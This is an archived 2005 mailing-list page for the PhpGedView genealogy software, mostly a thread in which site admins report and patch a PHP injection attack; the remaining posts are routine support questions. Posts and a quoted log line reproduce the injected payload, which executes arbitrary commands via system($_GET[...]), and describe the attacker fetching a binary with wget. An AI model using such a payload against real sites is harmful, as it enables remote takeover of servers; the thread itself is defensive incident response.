phpgedview-talk Mailing List for PhpGedView (Page 22)
Brought to you by:
canajun2eh,
yalnifj
You can subscribe to this list here.
2003 |
Jan
|
Feb
|
Mar
(1) |
Apr
|
May
(1) |
Jun
|
Jul
(2) |
Aug
(1) |
Sep
|
Oct
(1) |
Nov
(1) |
Dec
(5) |
---|---|---|---|---|---|---|---|---|---|---|---|---|
2004 |
Jan
(4) |
Feb
(3) |
Mar
(35) |
Apr
(37) |
May
(22) |
Jun
|
Jul
(2) |
Aug
(7) |
Sep
(10) |
Oct
(9) |
Nov
|
Dec
(16) |
2005 |
Jan
(16) |
Feb
(4) |
Mar
(48) |
Apr
(12) |
May
(4) |
Jun
(3) |
Jul
(4) |
Aug
(19) |
Sep
(31) |
Oct
(16) |
Nov
(7) |
Dec
(58) |
2006 |
Jan
(9) |
Feb
(14) |
Mar
(16) |
Apr
(12) |
May
(9) |
Jun
(9) |
Jul
(31) |
Aug
(19) |
Sep
(3) |
Oct
|
Nov
(11) |
Dec
(3) |
2007 |
Jan
(16) |
Feb
(1) |
Mar
(4) |
Apr
(17) |
May
(40) |
Jun
(14) |
Jul
(31) |
Aug
(10) |
Sep
(14) |
Oct
(64) |
Nov
(24) |
Dec
(13) |
2008 |
Jan
(12) |
Feb
(2) |
Mar
(7) |
Apr
(2) |
May
(16) |
Jun
(8) |
Jul
(4) |
Aug
(14) |
Sep
(13) |
Oct
(2) |
Nov
|
Dec
|
2009 |
Jan
(1) |
Feb
(11) |
Mar
(5) |
Apr
(6) |
May
|
Jun
(1) |
Jul
|
Aug
(1) |
Sep
(1) |
Oct
|
Nov
(2) |
Dec
|
2010 |
Jan
|
Feb
|
Mar
|
Apr
|
May
(1) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
(1) |
Nov
|
Dec
|
2011 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
(3) |
Dec
|
2016 |
Jan
|
Feb
|
Mar
|
Apr
|
May
(1) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
2017 |
Jan
(1) |
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
2018 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
(1) |
2019 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
(2) |
Nov
|
Dec
|
2022 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
(1) |
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
From: Keith C. <ke...@dr...> - 2005-12-20 22:01:28
|
John Finlay wrote: > > > > You should also block access to your site from the following IP addresses: > > 67.19.24.66 > > 62.42.112.10 > > > > --John > > John Finlay > > PhpGedView Project Manager > You should also add to the deny list: IP ADDRESS: 65.118.243.76 DNS LOOKUP: curlyjoe.sd.stargateinc.net This is the address hitting my server. Keith Conley |
From: John F. <Joh...@ne...> - 2005-12-20 21:45:53
|
You should also delete any 'suntzu' users that happen to be created in your pgv_users table. A quick sql line to do this is: delete from pgv_users where u_username like 'suntzu%'; --John -----Original Message----- From: php...@li... [mailto:php...@li...] On Behalf Of John Finlay Sent: Tuesday, December 20, 2005 2:42 PM To: John Finlay; php...@li... Subject: RE: [Phpgedview-talk] attack attempt Forgot to mention that you should look in the index directory for these or any other odd files. --John -----Original Message----- From: John Finlay=20 Sent: Tuesday, December 20, 2005 2:41 PM To: 'php...@li...' Subject: RE: [Phpgedview-talk] attack attempt So far the files that I have seen them try to use are: kn rs.php cbl.pl I have also added an updated login_register.php to the patch files which will prevent the user registration from occurring. https://sourceforge.net/tracker/index.php?func=3Ddetail&aid=3D1386434&gro= up_ id=3D55456&atid=3D477081 --John -----Original Message----- From: php...@li... [mailto:php...@li...] On Behalf Of Tastiger Sent: Tuesday, December 20, 2005 2:39 PM To: php...@li... Subject: Re: [Phpgedview-talk] attack attempt Does anyone know if this attack dumps a file anywhere in your directories? I've just received another 2 registration attempts from the same=20 attack - so I'm wondering if they have managed to inject a file somewhere? ------------------------------------------------------- This SF.net email is sponsored by: Splunk Inc. Do you grep through log files for problems? Stop! Download the new AJAX search engine that makes searching your log files as easy as surfing the web. DOWNLOAD SPLUNK! http://ads.osdn.com/?ad_id=3D7637&alloc_id=3D16865&op=3Dclick _______________________________________________ Phpgedview-talk mailing list Php...@li... https://lists.sourceforge.net/lists/listinfo/phpgedview-talk ------------------------------------------------------- This SF.net email is sponsored by: Splunk Inc. Do you grep through log files for problems? Stop! Download the new AJAX search engine that makes searching your log files as easy as surfing the web. DOWNLOAD SPLUNK! http://ads.osdn.com/?ad_idv37&alloc_id=16865&op=3Dick _______________________________________________ Phpgedview-talk mailing list Php...@li... https://lists.sourceforge.net/lists/listinfo/phpgedview-talk |
From: John F. <Joh...@ne...> - 2005-12-20 21:43:12
|
Forgot to mention that you should look in the index directory for these or any other odd files. --John -----Original Message----- From: John Finlay=20 Sent: Tuesday, December 20, 2005 2:41 PM To: 'php...@li...' Subject: RE: [Phpgedview-talk] attack attempt So far the files that I have seen them try to use are: kn rs.php cbl.pl I have also added an updated login_register.php to the patch files which will prevent the user registration from occurring. https://sourceforge.net/tracker/index.php?func=3Ddetail&aid=3D1386434&gro= up_ id=3D55456&atid=3D477081 --John -----Original Message----- From: php...@li... [mailto:php...@li...] On Behalf Of Tastiger Sent: Tuesday, December 20, 2005 2:39 PM To: php...@li... Subject: Re: [Phpgedview-talk] attack attempt Does anyone know if this attack dumps a file anywhere in your directories? I've just received another 2 registration attempts from the same=20 attack - so I'm wondering if they have managed to inject a file somewhere? ------------------------------------------------------- This SF.net email is sponsored by: Splunk Inc. Do you grep through log files for problems? Stop! Download the new AJAX search engine that makes searching your log files as easy as surfing the web. DOWNLOAD SPLUNK! http://ads.osdn.com/?ad_id=3D7637&alloc_id=3D16865&op=3Dclick _______________________________________________ Phpgedview-talk mailing list Php...@li... https://lists.sourceforge.net/lists/listinfo/phpgedview-talk |
From: John F. <Joh...@ne...> - 2005-12-20 21:42:18
|
So far the files that I have seen them try to use are: kn rs.php cbl.pl I have also added an updated login_register.php to the patch files which will prevent the user registration from occurring. https://sourceforge.net/tracker/index.php?func=3Ddetail&aid=3D1386434&gro= up_ id=3D55456&atid=3D477081 --John -----Original Message----- From: php...@li... [mailto:php...@li...] On Behalf Of Tastiger Sent: Tuesday, December 20, 2005 2:39 PM To: php...@li... Subject: Re: [Phpgedview-talk] attack attempt Does anyone know if this attack dumps a file anywhere in your directories? I've just received another 2 registration attempts from the same=20 attack - so I'm wondering if they have managed to inject a file somewhere? ------------------------------------------------------- This SF.net email is sponsored by: Splunk Inc. Do you grep through log files for problems? Stop! Download the new AJAX search engine that makes searching your log files as easy as surfing the web. DOWNLOAD SPLUNK! http://ads.osdn.com/?ad_id=3D7637&alloc_id=3D16865&op=3Dclick _______________________________________________ Phpgedview-talk mailing list Php...@li... https://lists.sourceforge.net/lists/listinfo/phpgedview-talk |
From: Chris M. <me...@ch...> - 2005-12-20 21:39:04
|
Hi all, I just started using PHPgedview, and I'm wondering if its possible to set up a guest account, that would say that anyone living is (for example) Living Moody, instead of giving my name? But anyone who is no longer living, would be listed with all of the information visible? This way I could protect the privacy of people who are still living, but maybe allow people who could possibly be related still be able to find me? Thanks, Chris -- Chris Moody me...@ch... Visit my blog: http://www.chrismoody.net/blog/ |
From: Tastiger <tas...@sc...> - 2005-12-20 21:38:55
|
Does anyone know if this attack dumps a file anywhere in your directories? I've just received another 2 registration attempts from the same attack - so I'm wondering if they have managed to inject a file somewhere? |
From: Tastiger <tas...@sc...> - 2005-12-20 20:50:26
|
Looks as though we are all getting the same person (s) trying this - looks as though mine didn't make it through registration seems as though he is using the same registration name everywhere... SUNTZU3645 Hello suntzu ... A request was received at ( snip) to create an account with your email address ( \';error_reporting(0);if(isset($suntzu)){system($_GET[suntzu]);die(\'HiMaster!\');}echo\' ). Information about the request is shown under the link below. Please click on the following link and fill in the requested data to verify your account and email address. I have applied the patch anyway - thanks for that! At 06:31 21/12/2005, you wrote: >I had a curious user request on my phpGedView site. Looks like they're >attempting some PHP injection style attack, using PHP code in the email >address and other field in the user table, like this |
From: Hernan J. L. <he...@mu...> - 2005-12-20 20:44:02
|
Intento de ingresar. Habia actualizado el archivo 20' antes y bloqueado IP's. Pero entro a traves de este IP. La version actualmente instalada es la 3.3.7 . Ya borre al usuario que no se habia autoverificado aun. Si alguien puede traducirlo para el resto de los usuarios, agradecido porque mi ingles es muy malo como para explicar esto. Saludos Hernan Lopez Este el Log 20.12.2005 17:25:07 - 201.236.15.145 - Login Failed ->HiMaster!<?php system($_GET[suntzu]);die;?><- 20.12.2005 17:25:14 - 201.236.15.145 - User registration requested for: SUNTZU1914 20.12.2005 17:25:14 - 201.236.15.145 - Anonymous user added user -> SUNTZU1914 <- ----- Original Message ----- From: Heike El-Ashi - Tromp <hei...@ya...> To: php...@li... Date: Tue, 20 Dec 2005 21:20:49 +0100 (CET) Subject: Re: [Phpgedview-talk] attack attempt > thanks for info. As my pc is not linux-operated I assume no harm was done. > Checked my phpGedView-log and saw that the hacker failed to login. > Uploaded the patch anyway. > Heike > > Matthew Gates <ma...@po...> schrieb: > wget is a command line tool for downloading web pages. You can use it for > mirroring pages (making local copies of pages) and all sorts. It's a very > useful little tool, and is commonly installed on unix-like operating > systems. In this case the attacker is trying to use it to download some > program (to do something - who knows what, but I bet it's not friendly). > > On Tuesday 20 Dec 2005 20:57, Heike El-Ashi - Tromp wrote: > > Hi Matthew, > > had an attack also. > > I am using 3.2.2. final. > > What is this wget? > > Regards, > > Heike > > > > Matthew Gates schrieb: > > Hi all, > > > > I had a curious user request on my phpGedView site. Looks like they're > > attempting some PHP injection style attack, using PHP code in the email > > address and other field in the user table, like this: > > > > \';error_reporting(0);if(isset($suntzu)) > > {system($_GET[suntzu]);die(\'HiMaster!\');}echo\' > > > > >From my log files it looks like the attacker was trying to download a > > > linux > > > > binary and a PHP script using wget. I grabbed the target files and can > > provide a sample if anyone is interested in trying to un-pick what they do > > (know a good linux dis-assembler?). > > > > Doesn't look like they managed to do anything nasty, probably because wget > > isn't available on my server. Just a heads up for everyone to keep an eye > > out. Grep your logs for wget. > > > > I reported the incident to SANS and they said they have seen it and sent > > me this link, which looks like a published version of the exploit: > > > > http://www.milw0rm.com/id.php?id=1379 > > > > ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4 > > final, so I think I would have been infected if I had had wget installed. > > Watch yourselves! > > > > I'm guessing we need a patch of some sort. > > > > Regards, > > > ------------------------------------------------------- > This SF.net email is sponsored by: Splunk Inc. Do you grep through log files > for problems? Stop! Download the new AJAX search engine that makes > searching your log files as easy as surfing the web. DOWNLOAD SPLUNK! > http://ads.osdn.com/?ad_id=7637&alloc_id=16865&op=click > _______________________________________________ > Phpgedview-talk mailing list > Php...@li... > https://lists.sourceforge.net/lists/listinfo/phpgedview-talk > > > > > --------------------------------- > Sarah Connor, Moshammer oder Papst Benedikt die Top-Suchen 2005. > > --------------------------------- > Sarah Connor, Moshammer oder Papst Benedikt die Top-Suchen 2005. > |
From: Heike El-A. - T. <hei...@ya...> - 2005-12-20 20:20:56
|
thanks for info. As my pc is not linux-operated I assume no harm was done. Checked my phpGedView-log and saw that the hacker failed to login. Uploaded the patch anyway. Heike Matthew Gates <ma...@po...> schrieb: wget is a command line tool for downloading web pages. You can use it for mirroring pages (making local copies of pages) and all sorts. It's a very useful little tool, and is commonly installed on unix-like operating systems. In this case the attacker is trying to use it to download some program (to do something - who knows what, but I bet it's not friendly). On Tuesday 20 Dec 2005 20:57, Heike El-Ashi - Tromp wrote: > Hi Matthew, > had an attack also. > I am using 3.2.2. final. > What is this wget? > Regards, > Heike > > Matthew Gates schrieb: > Hi all, > > I had a curious user request on my phpGedView site. Looks like they're > attempting some PHP injection style attack, using PHP code in the email > address and other field in the user table, like this: > > \';error_reporting(0);if(isset($suntzu)) > {system($_GET[suntzu]);die(\'HiMaster!\');}echo\' > > >From my log files it looks like the attacker was trying to download a > > linux > > binary and a PHP script using wget. I grabbed the target files and can > provide a sample if anyone is interested in trying to un-pick what they do > (know a good linux dis-assembler?). > > Doesn't look like they managed to do anything nasty, probably because wget > isn't available on my server. Just a heads up for everyone to keep an eye > out. Grep your logs for wget. > > I reported the incident to SANS and they said they have seen it and sent > me this link, which looks like a published version of the exploit: > > http://www.milw0rm.com/id.php?id=1379 > > ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4 > final, so I think I would have been infected if I had had wget installed. > Watch yourselves! > > I'm guessing we need a patch of some sort. > > Regards, ------------------------------------------------------- This SF.net email is sponsored by: Splunk Inc. Do you grep through log files for problems? Stop! Download the new AJAX search engine that makes searching your log files as easy as surfing the web. DOWNLOAD SPLUNK! http://ads.osdn.com/?ad_id=7637&alloc_id=16865&op=click _______________________________________________ Phpgedview-talk mailing list Php...@li... https://lists.sourceforge.net/lists/listinfo/phpgedview-talk --------------------------------- Sarah Connor, Moshammer oder Papst Benedikt die Top-Suchen 2005. --------------------------------- Sarah Connor, Moshammer oder Papst Benedikt die Top-Suchen 2005. |
From: Heike El-A. - T. <hei...@ya...> - 2005-12-20 20:16:29
|
Dear John, thanks for fast reaction. Have downloaded the file and uploaded it into my website. Will now check how I can block my site from the IP addresses mentioned. Somewhat frightening for a basically non-computing person, this attack Regards, Heike John Finlay <Joh...@ne...> schrieb: Dear PhpGedView Users, There is currently a hacker attempting to use PhpGedView websites to gain access to your sites. I have prepared a patch which will repair the possible security hole: https://sourceforge.net/tracker/index.php?func=detail&aid=1386434&group_id=55456&atid=477081 It is highly recommended that you apply this patch as soon as possible. This patch applies to all 3.x and greater versions of PGV. The same patch is also included in the latest 4.0 beta 3 release if you happen to be using the 4.0 versions. You should also block access to your site from the following IP addresses: 67.19.24.66 62.42.112.10 --John John Finlay PhpGedView Project Manager --------------------------------- Sarah Connor, Moshammer oder Papst Benedikt die Top-Suchen 2005. |
From: Matthew G. <ma...@po...> - 2005-12-20 20:07:07
|
wget is a command line tool for downloading web pages. You can use it for mirroring pages (making local copies of pages) and all sorts. It's a very useful little tool, and is commonly installed on unix-like operating systems. In this case the attacker is trying to use it to download some program (to do something - who knows what, but I bet it's not friendly). On Tuesday 20 Dec 2005 20:57, Heike El-Ashi - Tromp wrote: > Hi Matthew, > had an attack also. > I am using 3.2.2. final. > What is this wget? > Regards, > Heike > > Matthew Gates <ma...@po...> schrieb: > Hi all, > > I had a curious user request on my phpGedView site. Looks like they're > attempting some PHP injection style attack, using PHP code in the email > address and other field in the user table, like this: > > \';error_reporting(0);if(isset($suntzu)) > {system($_GET[suntzu]);die(\'HiMaster!\');}echo\' > > >From my log files it looks like the attacker was trying to download a > > linux > > binary and a PHP script using wget. I grabbed the target files and can > provide a sample if anyone is interested in trying to un-pick what they do > (know a good linux dis-assembler?). > > Doesn't look like they managed to do anything nasty, probably because wget > isn't available on my server. Just a heads up for everyone to keep an eye > out. Grep your logs for wget. > > I reported the incident to SANS and they said they have seen it and sent > me this link, which looks like a published version of the exploit: > > http://www.milw0rm.com/id.php?id=1379 > > ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4 > final, so I think I would have been infected if I had had wget installed. > Watch yourselves! > > I'm guessing we need a patch of some sort. > > Regards, |
From: Heike El-A. - T. <hei...@ya...> - 2005-12-20 19:57:43
|
Hi Matthew, had an attack also. I am using 3.2.2. final. What is this wget? Regards, Heike Matthew Gates <ma...@po...> schrieb: Hi all, I had a curious user request on my phpGedView site. Looks like they're attempting some PHP injection style attack, using PHP code in the email address and other field in the user table, like this: \';error_reporting(0);if(isset($suntzu)) {system($_GET[suntzu]);die(\'HiMaster!\');}echo\' From my log files it looks like the attacker was trying to download a linux binary and a PHP script using wget. I grabbed the target files and can provide a sample if anyone is interested in trying to un-pick what they do (know a good linux dis-assembler?). Doesn't look like they managed to do anything nasty, probably because wget isn't available on my server. Just a heads up for everyone to keep an eye out. Grep your logs for wget. I reported the incident to SANS and they said they have seen it and sent me this link, which looks like a published version of the exploit: http://www.milw0rm.com/id.php?id=1379 ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4 final, so I think I would have been infected if I had had wget installed. Watch yourselves! I'm guessing we need a patch of some sort. Regards, -- Matthew ------------------------------------------------------- This SF.net email is sponsored by: Splunk Inc. Do you grep through log files for problems? Stop! Download the new AJAX search engine that makes searching your log files as easy as surfing the web. DOWNLOAD SPLUNK! http://ads.osdn.com/?ad_idv37&alloc_id865&op=click _______________________________________________ Phpgedview-talk mailing list Php...@li... https://lists.sourceforge.net/lists/listinfo/phpgedview-talk --------------------------------- Sarah Connor, Moshammer oder Papst Benedikt die Top-Suchen 2005. |
From: John F. <Joh...@ne...> - 2005-12-20 19:43:17
|
Dear PhpGedView Users, =20 There is currently a hacker attempting to use PhpGedView websites to gain access to your sites. I have prepared a patch which will repair the possible security hole: https://sourceforge.net/tracker/index.php?func=3Ddetail&aid=3D1386434&gro= up_ id=3D55456&atid=3D477081 =20 It is highly recommended that you apply this patch as soon as possible. This patch applies to all 3.x and greater versions of PGV. The same patch is also included in the latest 4.0 beta 3 release if you happen to be using the 4.0 versions. =20 You should also block access to your site from the following IP addresses: 67.19.24.66 62.42.112.10 =20 --John John Finlay PhpGedView Project Manager |
From: Matthew G. <ma...@po...> - 2005-12-20 19:31:56
|
Hi all, I had a curious user request on my phpGedView site. Looks like they're=20 attempting some PHP injection style attack, using PHP code in the email=20 address and other field in the user table, like this: \';error_reporting(0);if(isset($suntzu)) {system($_GET[suntzu]);die(\'HiMaster!\');}echo\' =46rom my log files it looks like the attacker was trying to download a lin= ux=20 binary and a PHP script using wget. I grabbed the target files and can=20 provide a sample if anyone is interested in trying to un-pick what they do= =20 (know a good linux dis-assembler?). Doesn't look like they managed to do anything nasty, probably because wget= =20 isn't available on my server. Just a heads up for everyone to keep an eye= =20 out. Grep your logs for wget. I reported the incident to SANS and they said they have seen it and sent me= =20 this link, which looks like a published version of the exploit: http://www.milw0rm.com/id.php?id=3D1379 =2E..which claims to affect versions <=3D 3.3.7. I'm using phpGedView v3.3= =2E4=20 final, so I think I would have been infected if I had had wget installed. = =20 Watch yourselves! I'm guessing we need a patch of some sort. Regards, =2D-=20 Matthew |
From: Nic W. (Wharfegen) <n.t...@sh...> - 2005-12-20 16:05:33
|
I have been running ver. 3.3.4 (and lately testing 4.0.2 Beta) very successfully with my webhost using a large database (140,000 individuals - gedfile 54 Mb) with MySQL. A couple of days ago when trying to edit (using edit_interface.php & edit_quickupdate.php) and Soundex search (search.php) resulted in "Error 500 - Internal Server Error" pages being displayed. [Another issue has also been that when reimporting the file this task has not been fully completed - but with no error message.] Interestingly, importing a smaller gedfile (5000 individuals - 2.5 Mb) shows none of the difficulties above and everything behaves itself perfectly. In my "untechnical" way I suspect that some setting has been changed on the webserver - there does not appear to have been a change in the php versions or settings - but does anyone know what may be causing the problem and what I may need my web provider to check? Regards Nic Wilson Wharfedale & Craven Genealogical Study wharfegen.org.uk |
From: Keith C. <ke...@dr...> - 2005-12-19 19:27:38
|
Hello John and everyone else. I just updated two of my sites last night to PhpGedView 4.0 Beta 2 last night. The one feature I'm most interisted in is the ability to link to other Gedcoms and PGV web sites. When I try to link to an external site, I get a smear of errors, both sites are running 4.0b2, though the remote site is a fresh install and the local site is an upgrade. Any suggestions? I have a feeling I'm going to love this feature, if I can get it working. Thanks! Keith Conley Errors below: ERROR 8: Undefined index: 0 Error occurred on in function *getproxy* 1 called from line *648* of file *WSDL.php* in function *getproxy* 2 called from line *92* of file *serviceclient_class.php* in function *authenticate* 3 called from line *101* of file *addremotelink.php* ERROR 2: reset(): Passed variable is not an array or object 0 Error occurred on in function *reset* 1 called from line *653* of file *WSDL.php* in function *getproxy* 2 called from line *92* of file *serviceclient_class.php* in function *authenticate* 3 called from line *101* of file *addremotelink.php* *Warning*: reset(): Passed variable is not an array or object in */home/accountname/public_html/includes/SOAP/WSDL.php* on line *653* ERROR 2: current(): Passed variable is not an array or object 0 Error occurred on in function *current* 1 called from line *654* of file *WSDL.php* in function *getproxy* 2 called from line *92* of file *serviceclient_class.php* in function *authenticate* 3 called from line *101* of file *addremotelink.php* *Warning*: current(): Passed variable is not an array or object in */home/accountname/public_html/includes/SOAP/WSDL.php* on line *654* ERROR 2: reset(): Passed variable is not an array or object 0 Error occurred on in function *reset* 1 called from line *478* of file *WSDL.php* in function *generateproxycode* 2 called from line *670* of file *WSDL.php* in function *getproxy* 3 called from line *92* of file *serviceclient_class.php* in function *authenticate* 4 called from line *101* of file *addremotelink.php* *Warning*: reset(): Passed variable is not an array or object in */home/accountname/public_html/includes/SOAP/WSDL.php* on line *478* ERROR 2: current(): Passed variable is not an array or object 0 Error occurred on in function *current* 1 called from line *479* of file *WSDL.php* in function *generateproxycode* 2 called from line *670* of file *WSDL.php* in function *getproxy* 3 called from line *92* of file *serviceclient_class.php* in function *authenticate* 4 called from line *101* of file *addremotelink.php* *Warning*: current(): Passed variable is not an array or object in */home/accountname/public_html/includes/SOAP/WSDL.php* on line *479* *Fatal error*: Cannot instantiate non-existent class: webservice_ in */home/accountname/public_html/includes/SOAP/WSDL.php* on line *680* |
From: S.C. G. <alp...@gm...> - 2005-12-19 06:20:50
|
Version 3.3.7 & 4.0 beta2 load blank. error log shows; [Mon Dec 19 01:17:46 2005] [error] [client 192.168.2.1] PHP Fatal error: Call to undefined function: preg_match() in /usr/local/www/html/phpGedView/config.php on line 32 you may see my phpinfo() at http://vinland.ath.cx I have tried both php 4.4.1 and 5.1 -- ---S.C. Gehl, 'Beauty to Burn' |
From: <jgi...@t-...> - 2005-12-13 12:10:38
|
Hello John, is it now already meaningfully to install the new version 4.0 beta2 of PhpGedview? Josef |
From: Tastiger <tas...@sc...> - 2005-12-11 05:55:10
|
Am I missing something or is their no way to display Step children / brothers / sisters? What I can do is add a child to my family with my current partner - however that then shows the child as a "half sister" - which she isn't.... If I don't add her as a child of the current partnership - she doesn't appear to show up in a list of siblings.... As I said, I may be missing something obvious - but I am sure that this would be a very relevant entry in today's society.... |
From: Laie T. <la...@wi...> - 2005-12-08 17:09:16
|
On 8/Dec/2005 06:53 Michael Calleia wrote .. > I was wondering if there any instructions anyplace for adding a new > country to places? I want to add Malta and some towns. > > If there are not instructions, can I do it by just following what is > done for other countries? Creating a gif, txt and html file? > > Cheers, > > Michael Each country has its own folder under places that is the ISO 3-letter country code (MLT for Malta). Also, you may need to add an entry to the $countries array in languages/countries.en.php. After that, just create the gif, txt, and htm files. HTH, Laie Techie |
From: Michael C. <mca...@ny...> - 2005-12-08 13:53:56
|
I was wondering if there any instructions anyplace for adding a new country to places? I want to add Malta and some towns. If there are not instructions, can I do it by just following what is done for other countries? Creating a gif, txt and html file? Cheers, Michael |
From: Michael C. <mca...@ny...> - 2005-12-08 13:46:09
|
> waldo kitty wrote: > > Michael Calleia wrote: >> Hi, >> >> I am still getting a 553 Prohibited file name when trying to install >> 3.3.7 as well. My server company says file names with a \ as big >> no-no. >> >> What can I do? > > about a company stuck in M$ territory? not much other than to try > to help them to open their eyes and see what else is > out there in the /REAL/ world ;) O:) > >> I can not imagine this is the only company with an issue >> about \ > > rest assured, it is not... unfortunately, i don't have an answer > other than to recommend renaming the files you are > having problems with ;) > Actually the server is running Linux. I downloaded another version of ZIP file for 3.3.7 and decompressed on my machine, there are some oddly named file names in the same place (the ISR folder) this time with garbled names). Someone may want to check that there is no file corruption going on for those files. John Finlay wrote: >> You can just delete the ISR folder. (you can delete any folder in >> the >> places directory that you do not intend to use). >> >> On my computer I do not see any slashes (\). There are some files >> that >> are unicode encoded and perhaps the encoding is corrupted during the >> transfer. Odd, I am running OS X on my local machine and it handles unicode (or so I thought). Cheers, Michael |
From: waldo k. <wki...@al...> - 2005-12-07 04:36:00
|
John Finlay wrote: >> Hi Michael, >> >> You can just delete the ISR folder. (you can delete any folder in the >> places directory that you do not intend to use). >> >> On my computer I do not see any slashes (\). There are some files that >> are unicode encoded and perhaps the encoding is corrupted during the >> transfer. > > Michael Calleia wrote: > > Files that start with a . are OK. I have played with the .htaccess > file enough to be sure it is there. > > There are a bunch of file in phpGedView in the ISR folder (ISR is > inside places) that have \ in them. that's about the only thing i can think of... the version of phpGEDview that i'm running doesn't even have such a folder/directory... -- _\/ (@@) Waldo Kitty, Waldo's Place USA __ooO_( )_Ooo_____________________ telnet://bbs.wpusa.dynip.com _|_____|_____|_____|_____|_____|_____ http://www.wpusa.dynip.com ____|_____|_____|_____|_____|_____|_____ ftp://ftp.wpusa.dynip.com _|_Eat_SPAM_to_email_me!_YUM!__|_____|_____ wkitty42 -at- alltel.net --- avast! Antivirus: Outbound message clean. Virus Database (VPS): 0549-2, 12/06/2005 Tested on: 12/6/05 23:35:47 avast! - copyright (c) 1988-2005 ALWIL Software. http://www.avast.com |
From: waldo k. <wki...@al...> - 2005-12-07 04:31:56
|
Michael Calleia wrote: > Hi, > > I am still getting a 553 Prohibited file name when trying to install > 3.3.7 as well. My server company says file names with a \ as big no-no. > > What can I do? about a company stuck in M$ territory? not much other than to try to help them to open their eyes and see what else is out there in the /REAL/ world ;) O:) > I can not imagine this is the only company with an issue > about \ rest assured, it is not... unfortunately, i don't have an answer other than to recommend renaming the files you are having problems with ;) -- _\/ (@@) Waldo Kitty, Waldo's Place USA __ooO_( )_Ooo_____________________ telnet://bbs.wpusa.dynip.com _|_____|_____|_____|_____|_____|_____ http://www.wpusa.dynip.com ____|_____|_____|_____|_____|_____|_____ ftp://ftp.wpusa.dynip.com _|_Eat_SPAM_to_email_me!_YUM!__|_____|_____ wkitty42 -at- alltel.net --- avast! Antivirus: Outbound message clean. Virus Database (VPS): 0549-2, 12/06/2005 Tested on: 12/6/05 23:31:35 avast! - copyright (c) 1988-2005 ALWIL Software. http://www.avast.com |
From: John F. <Joh...@ne...> - 2005-12-06 17:20:02
|
Hi Michael, You can just delete the ISR folder. (you can delete any folder in the places directory that you do not intend to use). On my computer I do not see any slashes (\). There are some files that are unicode encoded and perhaps the encoding is corrupted during the transfer. --John -----Original Message----- From: php...@li... [mailto:php...@li...] On Behalf Of Michael Calleia Sent: Monday, December 05, 2005 9:29 PM To: php...@li... Subject: [Phpgedview-talk] Re: Phpgedview-talk digest, Vol 1 #138 - 2 msgs John, Files that start with a . are OK. I have played with the .htaccess =20 file enough to be sure it is there. There are a bunch of file in phpGedView in the ISR folder (ISR is =20 inside places) that have \ in them. Cheers, Michael ------------------------------------------------------- This SF.net email is sponsored by: Splunk Inc. Do you grep through log files for problems? Stop! Download the new AJAX search engine that makes searching your log files as easy as surfing the web. DOWNLOAD SPLUNK! http://ads.osdn.com/?ad_id=3D7637&alloc_id=3D16865&op=3Dclick _______________________________________________ Phpgedview-talk mailing list Php...@li... https://lists.sourceforge.net/lists/listinfo/phpgedview-talk |